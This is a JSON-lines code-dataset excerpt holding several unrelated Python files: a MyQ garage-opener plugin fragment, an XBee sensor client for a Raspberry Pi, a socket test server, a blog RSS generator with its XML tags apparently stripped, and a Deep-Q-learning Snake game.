indigo.device.create(protocol=indigo.kProtocol.Plugin,\n address=myqID,\n description = \"Opener Device auto-created by MyQ plugin from gateway information\",\n deviceTypeId='myqOpener',\n name=name)\n except Exception as err:\n self.logger.error(u'Error Creating Opener Device: %s (%s)' % (name, myqDevice[u'MyQDeviceId']))\n continue\n \n newdev.updateStateOnServer(key=\"doorStatus\", value=doorStateNames[state])\n if state == 2:\n newdev.updateStateOnServer(key=\"onOffState\", value=True)\n else:\n newdev.updateStateOnServer(key=\"onOffState\", value=False)\n self.logger.debug(u'Created New Opener Device: %s (%s)' % (newdev.name, newdev.address))\n self.logger.info(u\"%s %s is %s (%d)\" % (myqDevice['MyQDeviceTypeName'], name, doorStateNames[state], state))\n\n elif myqDevice['MyQDeviceTypeId'] == 3: # Light Switch?\n 
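                # Hedged sketch of the doorstate-to-name lookup performed for
                # opener devices above, written as a compact equivalent of
                # the out-of-range fallback to index 0 ("Unknown"):
                #
                #   state = 4
                #   name = (doorStateNames[state]
                #           if 0 <= state < len(doorStateNames)
                #           else doorStateNames[0])
                #   assert name == "Opening"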
pass\n# for attr in myqDevice['Attributes']:\n# self.logger.debug(u'\\t\"%s\" = \"%s\"' % (attr[u'AttributeDisplayName'], attr[u'Value']))\n\n else:\n for attr in myqDevice['Attributes']:\n self.logger.debug(u'\\t\"%s\" = \"%s\"' % (attr[u'AttributeDisplayName'], attr[u'Value']))\n\n\n ########################################\n\n def changeDeviceAction(self, pluginAction):\n self.logger.debug(u\"changeDeviceAction, deviceId = %s, actionId = \" % (pluginAction.deviceId, pluginAction.pluginTypeId))\n\n if pluginAction != None:\n myqDevice = indigo.devices[pluginAction.deviceId]\n myqActionId = pluginAction.pluginTypeId\n if myqActionId == \"openDoor\":\n self.changeDevice(myqDevice, kDoorOpen)\n elif myqActionId == \"closeDoor\":\n self.changeDevice(myqDevice, kDoorClose)\n else:\n self.logger.debug(u\"changeDeviceAction, unknown myqActionId = %s\" % myqActionId)\n\n def changeDevice(self, device, state):\n self.logger.debug(u\"changeDevice: %s, state = %s\" % (device.name, state))\n\n brand = self.pluginPrefs.get('openerBrand', None)\n \n if not self.myqLogin(username = self.pluginPrefs.get('myqLogin', None), password = self.pluginPrefs.get('myqPassword', None), brand=brand):\n self.logger.debug(u\"changeDevice: MyQ Login Failure\")\n return\n \n url = self.apiData[brand][\"service\"] + '/api/v4/DeviceAttribute/PutDeviceAttribute'\n# self.logger.debug(u\"changeDevice url = %s\" % str(url))\n\n headers = {\n 'SecurityToken': self.securityToken,\n 'MyQApplicationId': self.apiData[brand][\"appID\"],\n 'User-Agent': userAgent\n } \n# self.logger.debug(u\"changeDevice headers = %s\" % str(headers))\n\n payload = {\n 'attributeName': \"desireddoorstate\",\n 'myQDeviceId': int(device.address),\n 'AttributeValue': state,\n }\n# self.logger.debug(u\"changeDevice payload = %s\" % str(payload))\n \n try:\n response = requests.put(url, data=payload, headers=headers)\n except requests.exceptions.RequestException as err:\n self.logger.error(u\"changeDevice failure, RequestException: %s\" % (str(err)))\n return\n\n if (response.status_code != requests.codes.ok):\n self.logger.error(u\"changeDevice failure, Request error code: %s\" % (response.status_code))\n return\n \n data = response.json()\n if data['ReturnCode'] != '0':\n self.logger.debug(u\"changeDevice: Bad return code: \" + data['ErrorMessage'])\n\n # schedule an update to check on the movement\n self.next_status_check = time.time() + float(self.pluginPrefs.get('statusDelay', \"30\"))\n\n","sub_path":"MyQ.indigoPlugin/Contents/Server Plugin/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":23219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"397899463","text":"#coding: utf-8\nimport os\nimport logging\nimport logging.handlers\nlog_file = 'my.log'\nlog_file = ''\n\nlogger = logging.getLogger('JY')\nlogger.setLevel(level = logging.DEBUG)\n#日志文件大小最大为1024k,文件个数最多4个,my.log存放最新日志,my.log4存放最旧日志\nif log_file != '':\n handler = logging.handlers.RotatingFileHandler(log_file, maxBytes=1024, backupCount=3)\nelse:#调试模式,打印到终端\n handler = logging.StreamHandler()\n\nfmt = '%(message)s'\nformatter = logging.Formatter(fmt)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nlogger.debug('test')\n\n","sub_path":"python/loger_demo.py","file_name":"loger_demo.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"318194941","text":"# 
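# Hedged sketch of the XBee API-frame checksum that find_checksum() below
# computes: sum every byte after the 3-byte header (start delimiter plus
# two length bytes) and subtract from 0xFF. Toy frame bytes are
# illustrative only:
#
#   frame = [0x7E, 0x00, 0x04, 0x08, 0x01, 0x4E, 0x44]  # AT "ND" command
#   checksum = 0xFF - (sum(frame[3:]) & 0xFF)
#   assert checksum == 0x64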
--------------------------------------------------------------------------------------------- #\n# #\n# University of North Texas #\n# Department of Electrical Engineering #\n# #\n# Faculty Advisors: Dr. Xinrong Li, Dr. Jesse Hamner #\n# Name: Ovie Onoriose #\n# #\n# Date: 01/22/2017 #\n# #\n# Title: Occupancy Client for Raspberry Pi #\n# Version: 6.1.2 #\n# #\n# Description: #\n# This script sends a probe request on the Xbee connected to the Raspberry Pi #\n# to find all other active Xbee's (connected to sensor nodes) on the network #\n# It then proceeds to send requests and store the received data from each node #\n# sequentially. This received data is stored in a local SQlite database #\n# #\n# Dependencies: #\n# Python 3.5.1, Pyserial, sqlite3 #\n# #\n# Issues: #\n# The new CO2 sensors I received are different than the older ones and have a #\n# different protocol for accessing the sensor data. I will need to update the #\n# code to reflect the new protocol. The sensor nodes will also need to be updated #\n# to support the new mode of CO2 sensor #\n# #\n# Change Log:\n# v6.1.2 ((03/01/2017)\n# added trigger column to database if a pixel is higher than a certain\n# threshold #\n# v6.1 (01/22/2017) #\n# In the case that a node loses power or otherwise becomes unresponsive, #\n# Node discovery is performed to repopulate the list of active nodes so #\n# the program doesn't hang while trying to receive input #\n# #\n# --------------------------------------------------------------------------------------------- #\n\nimport serial\nimport sqlite3\nimport datetime\nimport time\nfrom collections import Counter\n\n# open serial port and connect to database\nser = serial.Serial('COM5', 115200, timeout=5) # open serial port\nconn = sqlite3.connect('occupancy.db') # connect to the database\nc = conn.cursor()\nc.execute(\"CREATE TABLE IF NOT EXISTS data (Node real, Datetime text, Grideye text, Trigger int, CO2PPM real, Temperature real, \\\nHumidity real, PIR real)\")\n\nnode_list = []\n\nclass MyList(list):\n def __repr__(self):\n return '[' + ', '.join(\"0x%X\" % x if type(x) is int else repr(x) for x in self) + ']'\n\n\ndef remove_node_dupes(x):\n count = Counter((i[1]) for i in x)\n while len([i for i in x if count[(i[1])] > 1]) > 1:\n x.remove(max([i for i in x if count[(i[1])] > 1]))\n count = Counter((i[1]) for i in x)\n\n\ndef find_checksum(packet): # find checksums of Xbee packets\n sum = 0\n for i in range(3,len(packet)):\n sum += packet[i]\n return (0xFF - (0xFF & sum))\n\ndef discovery():\n\n # reset serial buffers\n ser.flushInput()\n ser.flushOutput()\n time.sleep(.1)\n # send out broadcast requesting serials of all nodes on network\n node_request = [0x7E, 0x0, 0xF, 0x17, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xFF, 0xFF, 0xFF, 0xFE, 0x2, 0x73,\n 0x6C, 0xB] #checksum is already here\n ser.write(node_request)\n time.sleep(5)\n # received packets from nodes should be 23 bytes each\n nodes = int(ser.in_waiting/23)\n if nodes == 0:\n print('no nodes discovered')\n discovery()\n return\n del node_list[:]\n\n for i in range(nodes):\n a = ser.read()\n a = int.from_bytes(a, byteorder='big')\n if a != 0x7E: # check starting bit, discarding if wrong\n discovery()\n return\n l = ser.read(2)\n l = int.from_bytes(l, byteorder='big')\n b = ser.read()\n b = int.from_bytes(b, byteorder='big')\n if b != 0x97: # check if this is indeed a node identification packet\n discovery()\n return\n data = ser.read(l)\n node_address = tuple(data[14:18])\n node_list.append((i, node_address))\n print('node discovered. 
address:{0}'.format(MyList(list(node_address)),))\n remove_node_dupes(node_list)\n\n\ndef data_request(serial_low):\n ser.flushInput()\n ser.flushOutput()\n time.sleep(.1)\n # reset pin interrupt on launchpad\n request_end = [0x7E, 0x00, 0x10, 0x17, 0x00, 0x00, 0x13, 0xA2, 0x00] + list(serial_low) + \\\n [0xFF, 0xFE, 0x02, 0x44, 0x31, 0x04] # packet without checksum\n request_end.append(find_checksum(request_end)) # append checksum to packet\n ser.write(request_end)\n time.sleep(0.1)\n # Request for data for testing I'm sending test, the final thing to send is currently commented\n # toggles pin interrupt\n request = [0x7E, 0x00, 0x10, 0x17, 0x00, 0x00, 0x13, 0xA2, 0x00] + list(serial_low) + \\\n [0xFF, 0xFE, 0x02, 0x44, 0x31, 0x05] # packet without checksum\n request.append(find_checksum(request)) # append checksum to packet\n ser.write(request)\n print('requesting data from {0}\\n'.format(MyList(list(serial_low)),))\n return read_packet()\n\n\ndef read_packet():\n a = ser.read(1)\n if len(a) == 0:\n print('no data received. rediscovering nodes...\\n')\n return 1 # if no data is read, return 1 (Run discovery and restart at beginning of node_list)\n elif int.from_bytes(a, byteorder='big') != 0x7E: # check starting bit, discarding if wrong\n read_packet()\n return\n l = ser.read(2)\n l = int.from_bytes(l, byteorder='big') # calculate length of packet\n b = ser.read(1)\n b = int.from_bytes(b, byteorder='big')\n print('data type is {0}'.format(MyList([b]),))\n if b == 0x90:\n data_store(l)\n## elif b == 0x95:\n## node_joined(l)\n## return 2 # if a new node connects, return 2 (restart at beginning of node_list w/out running discovery)\n else:\n data = ser.read(l)\n print('data not synced right\\n')\n print(MyList(list(data)))\n if ser.in_waiting > 0:\n return read_packet()\n\n\ndef data_store(l):\n grideye = [0 for i in range(64)]\n data = ser.read(l) # read rest of packet\n print('data received:')\n print(MyList(list(data)))\n print('\\n')\n\n trigger = 0\n # Break data into more manageable sections\n # sixty four source address=data[0:8]\n # sixteen source address=data[8:10]\n rf_data = data[11:l - 1]\n\n node = rf_data[0]\n co2 = (rf_data[1] * 200)\n humid = ((rf_data[2] << 8) | rf_data[3]) / 10\n temp = ((rf_data[4] << 8) | rf_data[5]) / 10\n pir = rf_data[6]\n\n for i in range(64):\n grideye[i] = (((rf_data[2 * i + 7] << 8) | rf_data[2 * i + 8]) / 4)\n if grideye[i] > 25:\n trigger = 1\n\n # map grideye data to a string for simplicity in entering them into the database\n grid_str = ','.join(map(str, grideye))\n\n # finds the time\n current = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S:%f\")\n\n # insert data into database\n c.execute(\"INSERT INTO data(Node, Datetime, Grideye, Trigger, CO2PPM, Temperature, Humidity, PIR) VALUES (?, ?, ?, ?, ?, ?, ?, ?)\",\n (node, current, grid_str, trigger, co2, temp, humid, pir))\n conn.commit()\n\n\n##def node_joined(l):\n## data = ser.read(l)\n## node_address = tuple(data[17:21])\n## node_num = (max(x[0] for x in node_list)) + 1\n## node_list.append((node_num, node_address))\n## print('node joined. 
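## Hedged sketch of the big-endian 16-bit unpacking done in data_store()
## above: two payload bytes per GridEYE pixel, divided by 4 (assuming the
## sensor's 0.25-units-per-count scaling). Toy bytes, illustrative only:
##
##   import struct
##   hi, lo = 0x01, 0x90                      # one pixel, 0x0190 == 400
##   pixel = ((hi << 8) | lo) / 4             # -> 100.0
##   assert struct.unpack('>H', bytes([hi, lo]))[0] / 4 == pixel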
address:{0}'.format(MyList(list(node_address)),))\n## remove_node_dupes(node_list)\n\n####run once\n##discovery()\n##for t in range(5):\n## for i in node_list:\n## x = data_request(i[1]) # if data request returns 1, start over at discovery\n## if x: # if data request returns 2, start over at while loop after discovery\n## break\n## else:\n## time.sleep(.1)\n## continue\n## if x == 1:\n## break\n## else:\n## time.sleep(.1)\n## continue\n\n##run indefinitely\nwhile True:\n discovery()\n while True:\n for i in node_list:\n x = data_request(i[1]) # if data request returns 1, start over at discovery\n if x: # if data request returns 2, start over at while loop after discovery\n break\n if x == 1:\n break\n else:\n print('loop starting over')\n continue\n","sub_path":"Raspberry-Pi/RpiOccupancy-local.py","file_name":"RpiOccupancy-local.py","file_ext":"py","file_size_in_byte":10030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"383406076","text":"class message():\n '''\n The data structure for message.\n We might need to add some when it comes to conversational.\n '''\n\n def __init__(self, sender, receiver, message_type, data):\n self.sender = sender\n self.receiver = receiver\n self.message_type = message_type\n self.data = data\n\n\n","sub_path":"ConTS/Yelp/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"171913196","text":"#SERVER SIDE (PYTHON)\n# for pi2 = connected to monitor\n# add sorting of train cars? sounds kind of difficult but would be nice\n\nimport socket\nimport time\n\nimport os\n\nHOST = ''\nPORT = 5007\n\n#create a socket on the network using port 8080\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n#name of the host (router, unless it has no name, then return IP address)\nHOSTNAME = socket.gethostname()\nserver_address = (HOST, PORT)\nprint('Hostname: %s' % HOSTNAME)\nprint(HOST)\nprint('starting up on %s port %s' % (server_address[0], server_address[1]))\n\n#binds to the host and port\ns.bind(server_address)\n#listens to the bound host's port\n#waits for (1) connection\ns.listen(1)\nprint('listening for a connection...')\n\n(CONNECTION, ADDRESS) = s.accept()\nprint(ADDRESS)\nprint('connection found...')\n\n \ndata = CONNECTION.recv(1024).decode(\"utf-8\")\nmsg = data\ndata = int(data)\n\nif data <= 100:\n print(data)\nCONNECTION.close()","sub_path":"PI2/Tests/testserver.py","file_name":"testserver.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"133511579","text":"import statistics\nimport os\npath = \".\"\ndurations = []\nf = open(\"server.12679.log\")\ncounter = 0\nfor line in iter(f):\n if \"processing\" in line:\n for item in line.strip().split(\",\"):\n if \"used\" in item:\n duration = float(item.split(\" \")[2])\n durations.append(duration)\n counter += 1\n if counter == 3000:\n break\n \nf.close()\nprint(\"mean is:\", statistics.mean(durations))\nprint(\"var is:\", statistics.variance(durations))\n","sub_path":"bin/collect_process.py","file_name":"collect_process.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"650609273","text":"import time\nimport copy\nimport datetime\n\n\ndef get_feed(generator):\n tformat = \"%Y-%m-%d %H:%M\"\n\n res = []\n for md in 
generator.entry_cached:\n entries = generator.entry_cached[md][0]\n file_num_map = generator.entry_cached[md][1]\n\n for entry in entries.values():\n timestamp = time.mktime(datetime.\n datetime.\n strptime(entry.meta['date'], tformat).\n timetuple())\n meta = {}\n\n meta['action'] = \"New post in \" + generator.default['section']\n meta['date'] = entry.meta['date']\n meta['title'] = entry.meta['title']\n meta['section'] = generator.default['section']\n meta['description'] = entry.meta['description']\n blognum = file_num_map[entry.meta['md_filename']]\n meta['link'] = '${PREFIX}posts/blog' + str(blognum) + '.html'\n res.append((timestamp, meta))\n return res\n\n\nRSS_HEAD = '''\n\n\n\n'''\nRSS_END = '''\n\n\n'''\n\n\ndef produce_rss(generator):\n if 'rss_prefix' in generator.mdvar._global:\n prefix = generator.mdvar._global['rss_prefix']\n if not prefix.endswith('/'):\n prefix += '/'\n else:\n prefix = ''\n\n rss = [copy.deepcopy(RSS_HEAD)]\n rss.append('' +\n generator.mdvar._global['blogname'] +\n '')\n rss.append('' +\n prefix +\n '')\n rss.append('' +\n generator.mdvar._global['blogname'] +\n '')\n for item in sorted(get_feed(generator),\n key=lambda x: x[0],\n reverse=True)[:10]:\n rss.append('')\n rss.append('' + item[1]['title'] + '')\n rss.append('' + item[1]['link'] + '')\n rss.append('' + item[1]['description'] + '')\n rss.append('')\n\n rss.append(copy.deepcopy(RSS_END))\n\n fname = generator.mdvar._path['dst_prefix'] + 'rss.xml'\n content = '\\n'.join(rss).replace('${PREFIX}', prefix).strip('\\n')\n with open(fname, 'w') as f:\n f.write(content)\n","sub_path":"lib/template/blog/code/BlogFeed.py","file_name":"BlogFeed.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"288334442","text":"import random\r\nimport numpy as np\r\nfrom collections import deque\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation,Dropout\r\nfrom keras.optimizers import Adam\r\nfrom keras import backend as K\r\nimport matplotlib.pyplot as plt\r\nimport pygame\r\nimport random\r\n\r\n#setup/initialize the environment\r\nblack = (20,20,20)\r\nwhite = (230,230,230)\r\nred = (230,0,0)\r\ngreen = (0,230,0)\r\nblue = (0,0,230)\r\ndisplay_width = 40\r\ndisplay_height = 40\r\nclock = pygame.time.Clock()\r\nfps = 30\r\nEPISODES = 12000\r\n\r\n\r\nclass DQNAgent:\r\n\r\n def __init__(self, state_size, action_size):\r\n self.state_size = state_size\r\n self.action_size = action_size\r\n self.memory = deque(maxlen=2000)\r\n self.gamma = 0.95 # discount rate\r\n self.epsilon = 1.0 # exploration rate\r\n self.epsilon_min = 0.01\r\n self.epsilon_decay1 = 0.999616309\r\n self.epsilon_decay2 = 0.998696842\r\n self.learning_rate = 0.001\r\n self.model = self._build_model()\r\n self.target_model = self._build_model()\r\n self.update_target_model()\r\n\r\n def _build_model(self):\r\n # Neural Net for Deep-Q learning Model\r\n model = Sequential()\r\n model.add(Dense(128, input_dim=self.state_size))\r\n model.add(Activation('relu'))\r\n\r\n model.add(Dense(128))\r\n model.add(Activation('relu'))\r\n\r\n model.add(Dense(self.action_size, activation='linear'))\r\n model.compile(loss=\"mean_squared_error\",\r\n optimizer=Adam(lr=self.learning_rate))\r\n return model\r\n\r\n def update_target_model(self):\r\n # copy weights from model to target_model\r\n self.target_model.set_weights(self.model.get_weights())\r\n self.model.save(\"C:/Users/subha/Desktop/python_codes/project4/spcw.hdf5\")\r\n 
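        # Hedged sketch of the Bellman update computed in replay() below:
        # reward plus discounted max next-state Q-value (toy numbers,
        # illustrative only; note that replay() predicts Q_future with the
        # online model rather than target_model):
        #
        #   import numpy as np
        #   gamma, reward, done = 0.95, 1.0, False
        #   q_next = np.array([0.2, 0.8, 0.5, 0.1])
        #   target = reward if done else reward + gamma * np.amax(q_next)
        #   assert abs(target - 1.76) < 1e-9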
print(\"special model saved\")\r\n\r\n def remember(self, state, action, reward, next_state, done):\r\n self.memory.append((state, action, reward, next_state, done))\r\n\r\n def act(self, state):\r\n if np.random.rand() <= self.epsilon:\r\n return random.randrange(self.action_size)\r\n act_values = self.model.predict(state)\r\n return np.argmax(act_values[0]) # returns action\r\n\r\n def replay(self, batch_size):\r\n minibatch = random.sample(self.memory, batch_size)\r\n for state, action, reward, next_state, done in minibatch:\r\n target = self.model.predict(state)\r\n if done:\r\n target[0][action] = reward\r\n else:\r\n Q_future = self.model.predict(next_state)[0]\r\n target[0][action] = reward + self.gamma * np.amax(Q_future)\r\n self.model.fit(state, target, epochs=1, verbose=0)\r\n if self.epsilon > self.epsilon_min:\r\n self.epsilon *= self.epsilon_decay1\r\n\r\n def load(self,name):\r\n self.model.load_weights(name)\r\n\r\n def save(self,name):\r\n self.model.save_weights(name)\r\n\r\n\r\n\r\npygame.init()\r\n\r\nfont = pygame.font.SysFont(\"Arial.ttf\",30)\r\n\r\npygame.display.set_caption(\"snake environment for data fetch\")\r\n\r\ngameDisplay = pygame.display.set_mode((display_width,display_height),pygame.RESIZABLE)\r\n\r\n\r\n\r\n\r\n#define snake class\r\nclass Snake():\r\n def __init__(self):\r\n self.length_counter = 1\r\n self.body_list = []\r\n self.body_thickness = 20\r\n self.head_x = round(display_width / 2 / self.body_thickness) * self.body_thickness\r\n self.head_y = round(display_height / 2 / self.body_thickness) * self.body_thickness\r\n self.head_x_change = 0\r\n self.head_y_change = 0\r\n def draw(self,act):\r\n if act == 0 and self.head_x_change == 0:\r\n self.head_x_change = -self.body_thickness\r\n self.head_y_change = 0\r\n if act == 1 and self.head_x_change == 0:\r\n self.head_x_change = self.body_thickness\r\n self.head_y_change = 0\r\n if act == 2 and self.head_y_change == 0:\r\n self.head_y_change = -self.body_thickness\r\n self.head_x_change = 0\r\n if act == 3 and self.head_y_change == 0:\r\n self.head_y_change = self.body_thickness\r\n self.head_x_change = 0\r\n self.head_x += self.head_x_change\r\n self.head_y += self.head_y_change\r\n self.body_list.append([self.head_x,self.head_y])\r\n if len(self.body_list) > self.length_counter:\r\n del self.body_list[0]\r\n for XnY in self.body_list[:-1]:\r\n pygame.draw.rect(gameDisplay,white,[XnY[0],XnY[1],self.body_thickness,self.body_thickness])\r\n pygame.draw.rect(gameDisplay,red,[self.body_list[-1][0],self.body_list[-1][1],self.body_thickness,self.body_thickness])\r\n pygame.display.update()\r\n\r\n#define apple class\r\nclass Apple():\r\n def __init__(self):\r\n self.thickness = 20\r\n self.x_pos = round(random.randrange(0,display_width-self.thickness)/self.thickness)*self.thickness\r\n self.y_pos = round(random.randrange(0,display_height-self.thickness)/self.thickness)*self.thickness\r\n def draw(self):\r\n pygame.draw.rect(gameDisplay,blue,[self.x_pos,self.y_pos,self.thickness,self.thickness])\r\n pygame.display.update()\r\n\r\n#define apple eaten function\r\n\r\ndef apple_eaten(snake_obj,apple_obj):\r\n x = False\r\n if apple_obj.x_pos == snake_obj.head_x and apple_obj.y_pos == snake_obj.head_y:\r\n x = True\r\n snake_obj.length_counter += 1\r\n apple_obj.x_pos = round(random.randrange(0,display_width-apple_obj.thickness)/apple_obj.thickness)*apple_obj.thickness\r\n apple_obj.y_pos = round(random.randrange(0,display_height-apple_obj.thickness)/apple_obj.thickness)*apple_obj.thickness\r\n while 
True:\r\n if (apple_obj.x_pos,apple_obj.y_pos) in snake_obj.body_list:\r\n apple_obj.x_pos = round(random.randrange(0,display_width-apple_obj.thickness)/apple_obj.thickness)*apple_obj.thickness\r\n apple_obj.y_pos = round(random.randrange(0,display_height-apple_obj.thickness)/apple_obj.thickness)*apple_obj.thickness\r\n else:\r\n break\r\n return x\r\n\r\n\r\n#define game over function\r\n\r\ndef show_game_over_screen():\r\n gameOver = True\r\n gameExit = False\r\n text = \"game over press p to play again or q to quit\"\r\n text_to_screen = font.render(text,True,blue)\r\n text_rect = text_to_screen.get_rect()\r\n text_rect.center = display_width/2 , display_height/2\r\n while gameOver:\r\n gameDisplay.blit(text_to_screen,text_rect)\r\n pygame.display.update()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameOver = False\r\n gameExit = True\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_p:\r\n GameLoop()\r\n gameOver = False\r\n gameExit = True\r\n elif event.key == pygame.K_q:\r\n gameOver = False\r\n gameExit = True\r\n return gameOver,gameExit\r\n\r\n\r\n#define collision function\r\n\r\ndef collision(snake_obj):\r\n gameOver = False\r\n if snake_obj.head_x >= display_width or snake_obj.head_x < 0 or snake_obj.head_y >= display_height or snake_obj.head_y < 0:\r\n gameOver = True\r\n else:\r\n for XnY in snake_obj.body_list[:-1]:\r\n if XnY == snake_obj.body_list[-1]:\r\n gameOver = True\r\n break\r\n return gameOver\r\n\r\n\r\n#define show score function\r\n\r\ndef show_score(snake_obj):\r\n text = str(snake_obj.length_counter-1)\r\n text_to_screen = font.render(text,True,green)\r\n gameDisplay.blit(text_to_screen,[0,0])\r\n pygame.display.update()\r\n\r\n\r\ndef mod(x):\r\n if x>=0:\r\n return x\r\n return -x\r\n\r\ndef get_action(act):\r\n print(act , \"\\n\")\r\n\r\n\r\n\r\n#defining get_state function\r\ndef get_state(snake_obj,apple_obj):\r\n data_u = snake_obj.head_y / snake_obj.body_thickness\r\n data_l = snake_obj.head_x / snake_obj.body_thickness\r\n data_r = (display_width - snake_obj.head_x - snake_obj.body_thickness)/snake_obj.body_thickness\r\n data_d = (display_height - snake_obj.head_y - snake_obj.body_thickness)/snake_obj.body_thickness\r\n data_ul = 0\r\n data_ur = 0\r\n data_dl = 0\r\n data_dr = 0\r\n if data_u > data_l:\r\n data_ul = data_l * 2 ** .5\r\n else:\r\n data_ul = data_u * 2 ** .5\r\n\r\n if data_u > data_r:\r\n data_ur = data_r * 2 ** .5\r\n else:\r\n data_ur = data_u * 2 ** .5\r\n\r\n if data_d > data_l:\r\n data_dl = data_l * 2 ** .5\r\n else:\r\n data_dl = data_d * 2 ** .5\r\n\r\n if data_d > data_r:\r\n data_dr = data_r * 2 ** .5 - (apple_obj.thickness/snake_obj.body_thickness) * 2 ** .5\r\n else:\r\n data_dr = data_d * 2 ** .5 - (apple_obj.thickness/snake_obj.body_thickness) * 2 ** .5\r\n\r\n data_ul = round(data_ul,2)\r\n data_ur = round(data_ur,2)\r\n data_dl = round(data_dl,2)\r\n data_dr = round(data_dr,2)\r\n\r\n bin_app_u = 0\r\n bin_app_d = 0\r\n bin_app_r = 0\r\n bin_app_l = 0\r\n bin_app_ul = 0\r\n bin_app_ur = 0\r\n bin_app_dl = 0\r\n bin_app_dr = 0\r\n\r\n if mod(apple_obj.x_pos - snake_obj.head_x) == mod(apple_obj.y_pos - snake_obj.head_y):\r\n if apple_obj.x_pos > snake_obj.head_x and apple_obj.y_pos > snake_obj.head_y:\r\n bin_app_dr = 1\r\n elif apple_obj.x_pos < snake_obj.head_x and apple_obj.y_pos < snake_obj.head_y:\r\n bin_app_ul = 1\r\n elif apple_obj.x_pos > snake_obj.head_x and apple_obj.y_pos < snake_obj.head_y:\r\n bin_app_ur = 1\r\n elif apple_obj.x_pos < snake_obj.head_x and 
apple_obj.y_pos > snake_obj.head_y:\r\n bin_app_dl = 1\r\n elif apple_obj.x_pos == snake_obj.head_x:\r\n if apple_obj.y_pos > snake_obj.head_y:\r\n bin_app_d = 1\r\n else:\r\n bin_app_u = 1\r\n elif apple_obj.y_pos == snake_obj.head_y:\r\n if apple_obj.x_pos > snake_obj.head_x:\r\n bin_app_r = 1\r\n else:\r\n bin_app_l = 1\r\n\r\n\r\n\r\n bin_bod_u = 0\r\n bin_bod_d = 0\r\n bin_bod_r = 0\r\n bin_bod_l = 0\r\n bin_bod_ul = 0\r\n bin_bod_ur = 0\r\n bin_bod_dl = 0\r\n bin_bod_dr = 0\r\n for XnY in snake_obj.body_list[:-1]:\r\n if mod(XnY[0] - snake_obj.head_x) == mod(XnY[1] - snake_obj.head_y):\r\n if XnY[0] > snake_obj.head_x and XnY[1] > snake_obj.head_y:\r\n bin_bod_dr = 1\r\n elif XnY[0] < snake_obj.head_x and XnY[1] < snake_obj.head_y:\r\n bin_bod_ul = 1\r\n elif XnY[0] > snake_obj.head_x and XnY[1] < snake_obj.head_y:\r\n bin_bod_ur = 1\r\n elif XnY[0] < snake_obj.head_x and XnY[1] > snake_obj.head_y:\r\n bin_bod_dl = 1\r\n elif XnY[0] == snake_obj.head_x:\r\n if XnY[1] > snake_obj.head_y:\r\n bin_bod_d = 1\r\n else:\r\n bin_bod_u = 1\r\n elif XnY[1] == snake_obj.head_y:\r\n if XnY[0] > snake_obj.head_x:\r\n bin_bod_r = 1\r\n else:\r\n bin_bod_l = 1\r\n\r\n state = [data_l,bin_app_l,bin_bod_l,data_ul,bin_app_ul,bin_bod_ul,data_u,bin_app_u,bin_bod_u,data_ur,bin_app_ur,bin_bod_ur,data_r,bin_app_r,bin_bod_r,data_dr,bin_app_dr,bin_bod_dr,data_d,bin_app_d,bin_bod_d,data_dl,bin_app_dl,bin_bod_dl]\r\n #state = [data_u,data_l,data_r,data_d,data_ul,data_ur,data_dl,data_dr,bin_app_u,bin_app_l,bin_app_r,bin_app_d,bin_app_ul,bin_app_ur,bin_app_dl,bin_app_dr,bin_bod_u,bin_bod_l,bin_bod_r,bin_bod_d,bin_bod_ul,bin_bod_ur,bin_bod_dl,bin_bod_dr]\r\n return state\r\n\r\n\r\ndef GameLoop():\r\n #global gameDisplay\r\n global display_width\r\n global display_height\r\n state_size = 24\r\n action_size = 4\r\n max_score = 0\r\n agent = DQNAgent(state_size, action_size)\r\n print('state size:' ,state_size)\r\n print('action size: ', action_size)\r\n batch_size = 256\r\n output_dir = 'C:/Users/subha/Desktop/python_codes/project4'\r\n for e in range(EPISODES):\r\n gameDisplay = pygame.display.set_mode((display_width,display_height),pygame.RESIZABLE)\r\n gameOver = False\r\n score = 0\r\n counter = 0\r\n action_performed = 0\r\n snake_obj = Snake()\r\n apple_obj = Apple()\r\n C_state = get_state(snake_obj,apple_obj)\r\n C_state = np.array(C_state)\r\n C_state = np.reshape(C_state,[1,state_size])\r\n while not gameOver:\r\n reward = -1\r\n gameDisplay.fill(black)\r\n pygame.display.update()\r\n action_performed = agent.act(C_state)\r\n apple_obj.draw()\r\n snake_obj.draw(action_performed)\r\n temp = apple_eaten(snake_obj,apple_obj)\r\n gameOver = collision(snake_obj)\r\n show_score(snake_obj)\r\n N_state = get_state(snake_obj,apple_obj)\r\n N_state = np.array(N_state)\r\n N_state = np.reshape(N_state,[1,state_size])\r\n #print(C_state[0],\"->\",N_state[0])\r\n if gameOver == True:\r\n reward -= 100\r\n if temp == True:\r\n counter = 0\r\n reward += 100\r\n if snake_obj.length_counter-1 > max_score:\r\n max_score = snake_obj.length_counter-1\r\n agent.update_target_model()\r\n\r\n agent.remember(C_state, action_performed, reward, N_state, gameOver)\r\n C_state = N_state\r\n score += reward\r\n counter+=1\r\n if counter == round((display_width / snake_obj.body_thickness) * (display_height / snake_obj.body_thickness) * .7) :\r\n break\r\n clock.tick(fps)\r\n\r\n print(\"episode: {}/{}, score: {}, e: {:.2}\".format(e, EPISODES, score, agent.epsilon))\r\n\r\n if len(agent.memory) > batch_size:\r\n print(\"replaying 
